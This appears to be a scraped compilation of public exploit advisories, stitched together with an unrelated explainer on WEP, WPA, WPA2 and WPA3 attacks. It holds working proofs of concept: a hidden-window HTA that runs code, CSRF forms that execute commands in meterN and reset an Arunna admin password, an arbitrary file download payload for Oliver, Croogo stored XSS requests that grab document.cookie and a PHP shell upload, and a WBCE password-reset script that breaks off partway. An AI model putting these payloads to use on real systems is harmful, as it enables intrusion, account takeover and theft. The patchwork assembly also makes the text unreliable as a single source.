"Sales_Report_2021.csv
________________________________________________________.hta"
<!-- PoC payload opened from the MHT file: an HTA whose window is minimized,
     hidden from the taskbar and stripped of its system menu and caption, and
     whose VBScript runs calc.exe via WScript.Shell as a benign marker that
     code execution was reached. -->
<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no"
SYSMENU="no" CAPTION="no" />
<script language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("calc.exe")
</script>
3) Open the MHT file locally.
[Network Access]
Local
[POC/Video URL]
https://www.youtube.com/watch?v=UCSqFbYUvBk
[Disclosure Timeline]
Vendor Notification: May 13, 2019
MSRC : July 2, 2019
"We determined that a fix for this issue will be considered in a
future version of this product or service.
At this time, we will not be providing ongoing updates of the status
of the fix for this issue, and we have closed this case."
December 5, 2021 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
This article includes wireless security protocols including WEP, WPA, WPA2 and WPA3. For each of them, we will try to point out their advantages and disadvantages and describe some possible attacks.
WEP protocol
WEP was introduced as part of the original 802.11 standard approved in 1997 and it is probably the most commonly used WiFi security protocol. Its key of 10 or 26 hexadecimal digits (40-bit or 104-bit) is very easy to recover. In 2004, both WEP-40 and WEP-104 were declared deprecated. There are 128-bit (the most common) and 256-bit WEP variants, but as computing power continues to improve, attackers are able to exploit many security vulnerabilities. In short, this protocol can no longer meet security needs.
It uses the RC4 stream cipher to provide confidentiality and a CRC-32 checksum to ensure the integrity of the transmitted data. First, a key k is shared between network users (the protocol does not specify how to share it). To send a message M, the integrity checksum of the message is computed and appended, giving Mc(M). Mc(M) is then encrypted by XORing it with the RC4 keystream generated from k and a 24-bit public initialization vector (IV) named v. We denote this keystream RC4(v, k).
The result C=Mc(M) ⊕ RC4(v, k) is sent to the network, and users who know k can get the message through XORing C and RC4(v, k).
WEP uses RC4 stream cipher based on two algorithms:
The first is the RC4 Key Scheduling Algorithm (KSA), which converts a key of length 1 to 256 bits into an initial permutation S of the numbers 0 to N. The internal state of RC4 consists of two numbers i and j, which are used as pointers into S.
The second algorithm is the RC4-pseudo-random generation algorithm (PRGA). It generates a single byte key stream from the current internal state of RC4 and then updates the internal state. Initially, N=255, but the algorithm can use different N values.
With CRC32, the original message is XORed with a 32-bit constant followed by as many 0 as possible to reach the length of the message. The result becomes a new "message" and the operation is repeated until the length of the result is lower than the length of the constant. It should be noted that this hash function is linear and bondless.
WEP Attack:
Packet Injection Fake Authentication FMS Attack KoreK Attack Chop Attack Fragment Attack PTW Attack (Pychkine, Tews, Weinmann)
Packet Injection
This allows external personnel to generate a large amount of traffic on the network without having to be associated with it in any way. First, he must capture a specific type of packet. Although hidden behind encryption, packet type can be easily guessed based on packet size.
An ARP request packet is always 28 bytes. By reinjecting it into the network, the AP will respond to this forged request and send packets to the legitimate client. The extra traffic is used to collect encrypted packets faster, and the more packets he has, the sooner he is likely to break WEP.
Fake authentication
Fake authentication attack allows an attacker to join a WEP-protected network, even if he does not know the root key. Clients can authenticate themselves in WEP-protected networks in two ways:
The first method is to open system authentication, with basically no protection.
The second method is called shared key authentication. This uses a secret root key and challenge-response authentication. The client requires an AP to connect, and the AP sends a frame containing a challenge (random byte string, plaintext), and the client answers using WEP encrypted frames. If there is no problem, the AP will reply successfully.
An attacker who sniffs out a handshake can join the network itself. Except for the AP challenge, all bytes in frame 3 are constant. The challenge is transmitted in plaintext in frame 2, so the attacker can recover the key stream (and IV) used to encrypt frame 3. With it, he can now initiate the authentication handshake and construct a valid frame (number 3).
FMS Attack
Released in 2001 by Fluhrer, Mantin, and Shamir, it is based on the awareness of RC4 weaknesses with IVs (initialization vectors or random numbers, 3 bytes per packet key).
The attacker can manipulate RC4, allowing him to guess one byte (5% probability) of the key. If the key is wrong, the attacker will try again with the new key. To achieve a 50% success rate, an attacker needs to capture a large number of packets (up to 6 million).
If we know the first "l" bytes of each packet key, we can simulate RC4-KSA. Don't want the math here to go too deep, basically the next byte's key depends on (a bit related) the current byte and can be used to check if we are on the right track. Each iteration, we get one more byte of key and end up testing it. If it is wrong, the bytes of the key are switching with another possible value and restarting the process.
KoreK Attack
This is based on an FMS attack (first appeared in the netstumbler forum, 2004), but allows the attacker to find the key faster.
ChopChop Attack
Also found by "KoreK", it does not exploit a weakness of RC4 but attacks the WEP protocol itself (the CRC32 checksum and the lack of replay protection). It enables an attacker to decrypt packets without knowing the key.
Flip a bit in the ciphertext and then calculate which bit in the encrypted CRC32 value must be flipped so that the packet remains valid. The often mentioned method is to take out the last byte and try to guess its value.
Fragment Attack
If there is currently no client connected to the access point, a good attack can be run. Similar to the ChopChop attack, it speeds up the cracking process by injecting arbitrary packets into the AP. It will generate enough traffic to capture a large number of IVs, thereby improving the chances of cracking the keys (aircrack-ng). "aireplay-ng" and "packetforge-ng" are standard toolkits for such attacks.
PTW Attack
Pyshkin, Tews, Weinmann (PTW) attack, released in 2007.
What makes PTW more powerful than all other attacks is that it can take advantage of every packet captured. Instead of trying all possible key combinations, it implements a key sorting strategy, selects a set of possible keys and continues with the RC4 algorithm based on these keys. Using different voting strategies, an attacker can select the most likely key byte in each decision in the tree to determine the correct key.
Tests show that a 50% chance of success is obtained by just 35,000 to 40,000 packets. Other sources point out that we can get a 95% chance in 85,000 frames.
WPA
WPA was launched in 2003 by the Wi-Fi Alliance as a direct response to, and replacement for, the increasingly obvious vulnerabilities in the WEP encryption standard. The most common WPA configuration is WPA-PSK (Pre-Shared Key). The 256-bit key used by WPA is a significant increase over the 64-bit and 128-bit keys used in WEP systems.
Note: WPA-PSK basically means that the Wi-Fi network has a password shared by each Wi-Fi network client.
WPA includes message integrity checks (to determine if an attacker has captured/changed packets passed between the access point and the client) and the Temporal Key Integrity Protocol (TKIP). TKIP uses a per-packet key system, which is more secure than the fixed key system used by WEP. The TKIP encryption standard was later replaced by the Advanced Encryption Standard (AES).
TKIP uses the same underlying mechanism as WEP and is therefore vulnerable to many similar attacks (such as Chop-Chop, MIC key recovery attacks).
Usually people do not attack the WPA protocol directly, but instead target the supplementary system that accompanies WPA: Wi-Fi Protected Setup (WPS).
Note: TKIP (Temporal Key Integrity Protocol) uses the RC4 stream cipher with a 128-bit per-packet key, which means it dynamically generates a new key for each packet. Although still in use, it was considered obsolete after being replaced by CCMP in 2009.
WPA Attack:
Back and Tews Improved Attack on RC4, 2008, Inject Ohigashi-Morii Attack (Beck and Tews' + Man in the middle) Michael Attacks Dictionary Attack Handshake, Key Recovery
The attack requires Quality of Service (QoS) to be enabled. This allows multiple channels to be used. Each channel has its own TSC (TKIP sequence counter). Channel 0 carries most of the traffic, and the other channels have lower TSCs. The attack requires that the Key Renewal Interval be greater than 15 minutes (the time it takes to decrypt the ARP packet).
The attacker deauthenticates the station and then captures an ARP packet. Next, he performs the modified ChopChop attack to recover the packet's ICV (integrity check value) and MIC. For this, the attacker needs to guess the last part of the packet, i.e. the IP address. Finally, he inverts the Michael algorithm and obtains the MIC key. With it, he can now inject custom packets into the network.
Countermeasure: Disable QoS.
Two types of keys used for data encryption:
Pairwise Transient Key (PTK) – Used to protect unicast data frames
Group Temporal Key (GTK) – Used to protect group-addressed data frames (such as broadcast ARP frames)
The attacker sends an ARP request (with his MAC and AP's IP address), so other clients update their ARP table. This way, all clients will send their packets to the attacker. The attacker will receive packets decrypted by the AP and reencrypt them with his own key. Everyone can build and broadcast fake packets using GTK. Messages sent with group keys are not protected against spoofing.
WPA2 protocol
Of course, WPA2 replaces WPA. Certification began in September 2004 and from March 13, 2006 it became mandatory for all new devices bearing the Wi-Fi trademark. The most important upgrade is the mandatory use of the AES algorithm (rather than the previous RC4) and the introduction of CCMP (AES-CCMP, Counter Mode with Cipher Block Chaining Message Authentication Code Protocol, 128 bits) as the replacement for TKIP (which is still present in WPA2 as a fallback for WPA interoperability).
As in previous versions, attacks on WPS are the most common attacks.
Note: WPA/WPA2 MGT (Administrative) means that authentication does not use a pre-shared key but an authentication service, usually a RADIUS server that verifies the username/password of a Wi-Fi network client. MGT is most often associated with an enterprise/professional environment.
WPA2 Attack:
KRACK Attack PMKID Attack (PSK)WPS Attack Dictionary Attack
KRACK Attack
This attack targets the four-way handshake used to establish nonces (random numbers that feed a kind of "shared secret") in the WPA2 protocol. The WPA2 standard expects WiFi to be occasionally disconnected and allows reconnection reusing the same value in the third message of the handshake (for fast reconnection and continuity). Since the standard does not require a fresh key for this kind of reconnection, which may be requested at any time, replay attacks are possible.
Countermeasure: The access point has configuration options that can disable EAPOL-Key frame retransmission during key installation.
Useful: Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2
PMKID Attack (PSK)
On August 4, 2018, a new exploit was released for Wi-Fi networks using WPA/WPA2-PSK (pre-shared key). The vulnerability allows an attacker to obtain a PSK for a specific SSID.
The attack was unexpectedly discovered while looking for new methods to attack the new WPA3 security standards.
The main difference compared to other attacks is that in this attack, there is no need to capture a complete EAPOL 4 handshake. The new attack is performed against RSN IEs of a single EAPOL frame.
Normal users are no longer needed because the attacker communicates directly with the AP (also known as a "clientless" attack).
You do not need to wait for 4 handshakes between the average user and the AP.
No more retransmission of EAPOL frames (which may lead to uncrackable results) and invalid passwords sent by ordinary users.
EAPOL frames are not lost when a normal user or AP is too far from an attacker.
Nonce and replay counter values are no longer required (causing slightly higher speeds).
There are no more special output formats (pcap, hccapx, etc.) —— final data will be displayed as a regular hexadecimal encoded string.
Source: https://hashcat.net/forum/thread-7717.html Countermeasures: It is recommended to disable 802.11r on the WPA/WPA2-PSK network.
WPS Attack
WPS was launched in 2006, and the goal of the protocol is to allow Wi-Fi-protected access to home users who know very little about wireless security, and to easily add new devices to existing networks without entering a long password.
In December 2011, a vulnerability was discovered to affect a WPS-capable wireless router. The vulnerability allows remote attackers to recover WPS PIN within a few hours through brute force attacks and use WPS PIN to recover the network's WPA/WPA2 pre-shared key.
WPS enables clients to send an 8-digit PIN to the access point, which the access point verifies before allowing the client to connect. The PIN contains only digits, and there is latency in WPS because the attacker has to wait for the AP to respond. Therefore, an attacker can only try several PINs per second (or one PIN every few seconds).
We have 8 digits with 10 possible values each, i.e. $10^8$ (100,000,000) combinations. This is too much. But the 8th digit is a checksum of the first 7, so we are down to $10^7$. Additionally, the PIN is verified in two halves, so the first 4 and the last 4 digits can be verified independently. It is much easier to guess two 4-digit numbers one at a time than one 8-digit number. The math finally gives: $10^4 + 10^3 = 11{,}000$ guesses.
While this strategy used to take hours, the newer WPS Pixie-Dust attacks could crack the network in seconds. Since 2011, many routers now have protections to detect and slow down (rate limit) or turn off Reaver type attacks (locking too many failed PIN attempts).
Routers have updated some settings to prevent WPS, but the way they implement encryption remains flawed. Creating true random numbers is relatively difficult, which is necessary to generate strong encryption. To achieve this, there is usually a function that takes a "seed" and produces a pseudo-random number.
If you use long or variable "seed" numbers, you can get the same results as actually random numbers, but if you use "seed" that is easy to guess, or worse, using the same "seed" time and time again, you end up with weak encryption that is easy to crack. That's what happens with those newer routers, what the WPS Pixie-Dust attacks exploit.
Countermeasure: Turn off WPS function.
Dictionary Attack
This relies on capturing the WPA handshake and then using a word list or brute force to crack the password. Depending on the password strength (length, character set), it can be difficult or impossible to crack it in a "reasonable" time.
Countermeasure: Use long passwords (12+) and different character sets (alphanumeric, special characters, uppercase/lowercase).
WPA3 protocol
In January 2018, the Wi-Fi Alliance announced WPA3 to replace WPA2. The new standard uses 128-bit encryption in WPA3-Personal mode (WPA-PSK pre-shared key) or 192-bit in WPA3-Enterprise (RADIUS authentication server).
WPA3 will be harder to attack because its modern key establishment protocol, called Simultaneous Authentication of Equals (SAE) or Dragonfly key exchange, improves the security of the initial key exchange and provides better protection against offline dictionary attacks.
But it is equally vulnerable to man-in-the-middle attacks and cannot resist evil WiFi phishing attacks.
# Exploit Title: meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)
# Date: 18/11/2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.metern.org
<!--
meterN v1.2.3 Authenticated Remote Command Execution Vulnerability
Vendor: Jean-Marc Louviaux
Product web page: https://www.metern.org
Affected version: 1.2.3 and 0.8.3.2
Summary: meterN is a set of PHP/JS files that make a -Home energy metering & monitoring- solution.
It accepts any meters like : electrical, water, gas, fuel consumption, solar, Wind energy production
and so on. Sensors such as temperature or humidity are also accepted. The philosophy is: To keep it
simple, fast, with a low foot print to run on cheap and low powered devices.
Desc: The application suffers from an authenticated OS command execution vulnerability. This can be
exploited to execute arbitrary commands through the 'COMMANDx' and 'LIVECOMMANDx' POST parameters in
admin_meter2.php and admin_indicator2.php scripts. The application interface allows users to perform
these actions through HTTP requests without performing any validity checks to verify the requests.
This CSRF can be exploited to perform actions with administrative privileges if a logged-in user
visits a malicious web site.
---------------------------------------------------------------------------------------------------
/admin/admin_meter2.php:
------------------------
69: if (!empty($_POST['COMMANDx']) && is_string($_POST['COMMANDx'])) {
70: $COMMANDx = htmlspecialchars($_POST['COMMANDx'], ENT_QUOTES, 'UTF-8');
71: } else {
72: $COMMANDx = '';
73: }
...
...
108: if (!empty($_POST['LIVECOMMANDx']) && is_string($_POST['LIVECOMMANDx'])) {
109: $LIVECOMMANDx = htmlspecialchars($_POST['LIVECOMMANDx'], ENT_QUOTES, 'UTF-8');
110: } else {
111: $LIVECOMMANDx = '';
112: }
...
...
271: exec("$COMMANDx 2>&1", $datareturn);
...
...
303: exec("$LIVECOMMANDx 2>&1", $datareturn);
---------------------------------------------------------------------------------------------------
Tested on: Apache/2.4.10 (Raspbian)
Apache/2.4.46 (Win64)
Linux 4.9.67-v7+ GNU/Linux (armv7l)
Microsoft Windows 10 Home (10.0.19042 Build 19042)
PHP/7.2.33
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5690
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5690.php
18.11.2021
-->
PoC #1:
-------
<html>
<body>
<form action="http://localhost/metern/admin/admin_indicator2.php" method="POST">
<input type="hidden" name="NUMINDx" value="1" />
<input type="hidden" name="INDNAMEx1" value="test" />
<input type="hidden" name="IDx1" value="1" />
<input type="hidden" name="COMMANDx1" value="calc" />
<input type="hidden" name="bntsubmit1" value="Test command" />
<input type="hidden" name="UNITx1" value="" />
<input type="submit" value="Incongruity" />
</form>
</body>
</html>
PoC #2:
-------
<html>
<body>
<form action="http://localhost/metern/admin/admin_meter2.php" method="POST">
<input type="hidden" name="METNAMEx" value="Conso" />
<input type="hidden" name="COLORx" value="962629" />
<input type="hidden" name="TYPEx" value="Elect" />
<input type="hidden" name="PRODx" value="2" />
<input type="hidden" name="PHASEx" value="1" />
<input type="hidden" name="SKIPMONITORINGx" value="" />
<input type="hidden" name="IDx" value="elect" />
<input type="hidden" name="COMMANDx" value="houseenergy -energy" />
<input type="hidden" name="PASSOx" value="100000" />
<input type="hidden" name="PRICEx" value="0.23" />
<input type="hidden" name="LIDx" value="elect" />
<input type="hidden" name="LIVECOMMANDx" value="calc" />
<input type="hidden" name="bntsubmit" value="Test live command" />
<input type="hidden" name="EMAILx" value="" />
<input type="hidden" name="WARNCONSODx" value="15000" />
<input type="hidden" name="NORESPMx" value="true" />
<input type="hidden" name="POAKEYx" value="" />
<input type="hidden" name="POUKEYx" value="" />
<input type="hidden" name="TLGRTOKx" value="" />
<input type="hidden" name="TLGRCIDx" value="" />
<input type="hidden" name="met_numx" value="1" />
<input type="submit" value="Incongruity" />
</form>
</body>
</html>
# Exploit Title: Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration
# Date: 13/12/2021
# Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed
# Vendor Homepage: https://www.cybelesoft.com
# Software Link: https://www.cybelesoft.com/thinfinity/virtualui/
# Version: vulnerable < v3.0
# Tested on: Microsoft Windows
# CVE: CVE-2021-44848
How it works: By accessing the vector, an attacker can determine if a username exists thanks to the message returned; it can be presented in different languages according to the configuration of VirtualUI. Common users are administrator, admin, guest...
Payload: The vulnerable vector is "https://example.com/changePassword?username=USERNAME", where "USERNAME" needs to be brute-forced.
Reference: https://github.com/cybelesoft/virtualui/issues/1
# Exploit Title: Oliver Library Server v5 - Arbitrary File Download
# Date: 14/12/2021
# Exploit Authors: Mandeep Singh, Ishaan Vij, Luke Blues, CTRL Group
# Vendor Homepage: https://www.softlinkint.com/product/oliver/
# Product: Oliver Server v5
# Version: < 8.00.008.053
# Tested on: Windows Server 2016
Technical Description:
An arbitrary file download vulnerability in Oliver v5 Library Server versions < 8.00.008.053, via the FileServlet function, allows an attacker to download arbitrary files because the user-supplied file path is used unsanitized.
Steps to Exploit:
1) Use the following Payload:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=<arbitrary file path>
2) Example to download iis.log file:
https://<hostaddress>/oliver/FileServlet?source=serverFile&fileName=c:/windows/iis.log
# Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
# Date: November 29, 2021
# Exploit Author: =(L_L)=
# Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/
# Vendor Homepage: https://github.com/arunna
# Software Link: https://github.com/arunna/arunna
# Version: 1.0.0
# Tested on: Ubuntu 20.04.2 LTS
<!--
The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on).
-->
<html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr>
<tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr>
<tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr>
<tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr>
<tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr>
<tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr>
<tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr>
<tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr>
<tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr>
<tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr>
<tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr>
<tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr>
<tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr>
<tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr>
<tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr>
<tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr>
<tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr>
<tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr>
<tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr>
<tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr>
<tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr>
</table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html>
# Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 06/12/2021
# Exploit Author: Enes Özeser
# Vendor Homepage: https://croogo.org/
# Software Link: https://downloads.croogo.org/v3.0.2.zip
# Version: 3.0.2
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3
==> 'Content-Type' Stored Cross-Site Scripting (/admin/file-manager/attachments/add) <==
POST /admin/file-manager/attachments/add HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------114221148012003093972656004730
Content-Length: 923
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/file-manager/attachments/add
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_method"
POST
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_csrfToken"
c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="file"; filename="file.txt"
Content-Type: <script>alert(document.cookie)</script>
Enes Ozeser (@enesozeser)
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_Token[fields]"
16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A
-----------------------------114221148012003093972656004730
Content-Disposition: form-data; name="_Token[unlocked]"
-----------------------------114221148012003093972656004730--
==> 'title' Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <==
POST /admin/taxonomy/types/edit/5 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 590
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)admin/taxonomy/types/edit/5
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
title=<script>alert(document.cookie)</script>&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0&
comment_approve=1&comment_spam_protection=0&comment_captcha=0&params=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1&
format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_apply
==> 'title' Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <==
POST /admin/blocks/regions/edit/3 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 336
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/blocks/regions/edit/3
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
title=<script>alert(document.cookie)</script>&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_apply
==> 'title' Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <==
POST /admin/file-manager/attachments/edit/20 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 363
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/file-manager/attachments/edit/20
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&
title=<script>alert(document.cookie)</script>&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_apply
# Exploit Title: Croogo 3.0.2 - Unrestricted File Upload
# Date: 06/12/2021
# Exploit Author: Enes Özeser
# Vendor Homepage: https://croogo.org/
# Software Link: https://downloads.croogo.org/v3.0.2.zip
# Version: 3.0.2
# Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3
==> 'setting-43' Unrestricted File Upload <==
1- Login with your privileged account.
2- Click on the 'Settings' section.
3- Go to the 'Themes'. Directory is '/admin/settings/settings/prefix/Theme'
4- Choose a malicious php script and upload it.
5- Go to '/uploads/(NAME).php', replacing 'NAME' with the filename you uploaded.
6- The malicious PHP script will be executed.
POST /admin/settings/settings/prefix/Theme HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------360738881613175158033315978127
Content-Length: 970
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/admin/settings/settings/prefix/Theme
Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_method"
POST
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_csrfToken"
c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="setting-43"; filename="malicious.php"
Content-Type: application/octet-stream
<?php
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_Token[fields]"
c4e0a45b25b5eaf8fa6e0e4ddcd3be00c621b803%3A
-----------------------------360738881613175158033315978127
Content-Disposition: form-data; name="_Token[unlocked]"
-----------------------------360738881613175158033315978127--
# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset
# Google Dork: intext: "Way Better Content Editing"
# Date: 20/12/2021
# Exploit Author: citril or https://github.com/maxway2021
# Vendor Homepage: https://wbce.org/
# Software Link: https://wbce.org/de/downloads/
# Version: <= 1.5.1
# Tested on: Linux
# CVE : CVE-2021-3817
# Github repo: https://github.com/WBCE/WBCE_CMS
# Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75
import requests
# Target: the WBCE "forgot password" handler on a local test instance.
_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment
# Domain whose incoming mail the tester controls; the reset mail is addressed to admin@<this domain>.
_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature
headers = {
'User-Agent': 'Mozilla/5.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'close'
}
